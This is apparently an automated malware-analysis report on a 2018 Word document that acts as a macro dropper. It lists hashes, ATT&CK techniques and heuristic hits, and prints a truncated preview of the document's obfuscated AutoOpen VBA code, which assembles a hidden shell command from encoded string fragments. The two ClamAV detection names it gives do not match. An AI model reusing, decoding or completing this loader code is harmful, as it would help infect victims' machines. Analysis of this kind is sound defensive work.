Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c24dce174bbe7ad4…

MALICIOUS

Office (OLE)

Size: 234.8 KB
Created: 2018-06-27 21:40:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: 043ead79bed8f5e91b4495103edc4e0f
SHA-1: adaf9c605c277fec23ebdf1aa3536ad03cb407b7
SHA-256: c24dce174bbe7ad49447a1e0c9c16babe2f040f15c9f5a8c874f1779062b0aef
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, a common technique for executing arbitrary commands. This suggests the document is a dropper designed to download and execute a secondary payload. The ClamAV detection name 'Doc.Dropper.Agent-6593498-0' further supports this assessment.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6593549-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6593549-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9537 bytes
SHA-256: d82558de4c44c63084aed7e493c2490cb63b55f40382aacdee771a38a593d05f

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "DwbtGBq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HaUishjS"
Function zhAhX()
On Error Resume Next
ZQwzIP = CDate(64687)
YKsUX = Sin(54011)
VpTXz = 20365
uaNJB = 29006
wvXdA = 59451
ENuvT = bXRKtD
jjUbImL = "Hell  ." + " " + Chr(40) + Chr(40) + "Gv" + " '*" + "mDr*'" + Chr(41) + ".NaMe" + "[3,11," + "2]-J" + "OiN" + "''" + Chr(41)
DXYzAc = Sin(60015)
qWbmV = 19273
NblavP = XzIcDM
oUTZlL = 46231
KszWh = 1826
lBkJVZ = CDate(2849)
fGGjo = " " + Chr(40) + " -joIN" + Chr(40) + " " + "'42<121T" + "84j12" + "7p" + "51N9" + "6{10" + "7r121j35" + "g97j" + "108{" + "100!1"
GlVFZZ = Sin(18534)
cDjtzk = 50736
zpOQCj = DOOvTa
ndbPd = 95434
LoqJs = 22015
LcIzzW = CDate(91976)
oauHsoCl = "07" + "{10" + "9p122b46" + "!64b107" + "{122T32" + "g89" + "b10"
ASPOps = Sin(4440)
AKTRY = 32913
NXwiZa = raKHcZ
GbQKar = 42971
kcjPNk = 65110
fMliRZ = CDate(74648)
HlAozFoAuoB = "7p1" + "08r77" + "{98p103p" + "10" + "7N96T12" + "2r53b42<" + "103<88<1" + "01{51g"
MsHWIK = Sin(92379)
rsNkVw = 63775
TFrdu = OMpMP
SAsaF = 84329
FmiXKp = 35525
wPHNR = CDate(99906)
XMArALYKwu = "41b102" + "j122!12" + "2<1" + "26j52<" + "33p33<12" + "1!121" + "r121p32<" + "124{10" + "3b" + "120N10" + "7r124b11"
Lvwrw = Sin(40857)
zEtRhw = 8149
cYECj = TSEwR
WCzuVF = 31108
GqTWFq = 24232
zEHPni = CDate(94214)
rfYXWEvO = "1g124!9" + "7g108b98" + "j107r" + "125g32N1" + "09!" + "97j99g3"
WFrvL = Sin(57650)
JAZCc = 50514
NZAdQl = hzqJw
RzAwR = 17327
NZhQIJ = 77146
XqSEss = CDate(43495)
HaAJTmn = "3T55N55b" + "71T99<3" + "3b78T1" + "02N122p1" + "22T" + "126!5" + "2T33j33j" + "121"
ncSvl = Sin(94056)
swOmc = 54472
zWrNU = sjVHzD
Ydfqs = 32429
ijXhDq = 28983
VEwJt = CDate(60286)
UbBuPvV = "g121{" + "12" + "1g32N99" + "g12" + "3<99r10" + "8!11" + "1p103N99" + "T97p10" + "6{107" + "p98b107" + "j125j"
mOiwh = Sin(47162)
wsoCRO = 71142
OsOQor = wJKiY
zzvpL = 35190
KoTizb = 74243
EfzFtW = CDate(89707)
iZiwU = "109j97!" + "124N122" + "!32p1" + "09" + "<97" + "r99p3" + "3g54T98T" + "67!" + "56j56p1" + "03p3" + "3N7" + "8p102!1"
zhAhX = jjUbImL + fGGjo + oauHsoCl + HlAozFoAuoB + XMArALYKwu + rfYXWEvO + HaAJTmn + UbBuPvV + iZiwU
BQiQt = Sin(83157)
zbBXIj = 44467
zhwED = hqPbZX
fUvKEJ = 86315
IrGPz = 77155
PlTjJz = CDate(12615)
End Function
Function RfjPcHh()
On Error Resume Next
IUIil = Sin(81545)
IdESMQ = 7737
wZVCpp = pEGUow
SzXsfs = 87748
ZZOSZJ = 85143
prZvi = CDate(54824)
OrKHTq = "22{12" + "2N126b" + "52p3" + "3p33b121" + "!12" + "1b1" + "21T32T" + "119!" + "123N" + "119"
AVwTvo = Sin(60518)
zjUHSG = 30018
NjciUA = nXQjww
dRrYo = 87432
mVZzXw = 93054
RqbBUJ = CDate(28837)
XdGIZ = "{123" + "T107" + "g116!" + "108" + "j32!" + "109" + "T97g"
KDjzL = Sin(90908)
DLAZpc = 58788
YmtHJV = zrwPKz
fEdlXR = 42213
FcGrT = 35837
uYlwN = CDate(54287)
jhwDozVH = "99r33p12" + "0N" + "102j9" + "6r100T6" + "8p10" + "0N33N" + "78<102r1" + "22j1"
iiCHQ = Sin(33409)
jjtfL = 73876
kzbtI = hQASB
XuEjC = 2435
uRcntO = 4507
aFHFC = CDate(72146)
NtSKpjHGiz = "22!126{" + "52b33" + "N33b" + "121r" + "121" + "N1"
YGjwTn = 9760
zLGcE = Sin(37690)
JvLzS = CDate(92266)
dXTuDv = 55484
iwLlsf = 12259
OszVGB = JhfGE
aRwoZaq = "21{32j12" + "2<12" + "5{1" + "02<" + "123b10" + "1!123" + "!99!3"
qhfns = 96597
mPrsfM = Sin(82700)
qFOdX = CDate(91617)
awjcu = 48967
iTzcuO = 77493
IKQWp = mOYmNC
ACiIat = "2<123r9" + "6N121" + "r103{10" + "1g12" + "3p" + "32!11" + "1j10"
WflRF = 38712
tYlGZ = Sin(81082)
JMuFY = CDate(47453)
YmPHr = 11998
uUXcr = 36160
EhflGS = kizsGb
YYJJETQ = "9b" + "32{10" + "3j106g33" + "g88" + "j55b12" + "7{72N96" + "T70N123!" + "33N" + "78{102" + "{1" + "22"
cWSuD = 99503
BAlHi = Sin(53511)
GFmCiI = CDate(36234)
XQkQU = 24547
KMlhkw = 70436
RsiAnn = BtUBwT
zZUwcd = "p12" + "2T12" + "6p52T" + "33j33" + "N121<1" + "21g" + "12" + "1
... (truncated)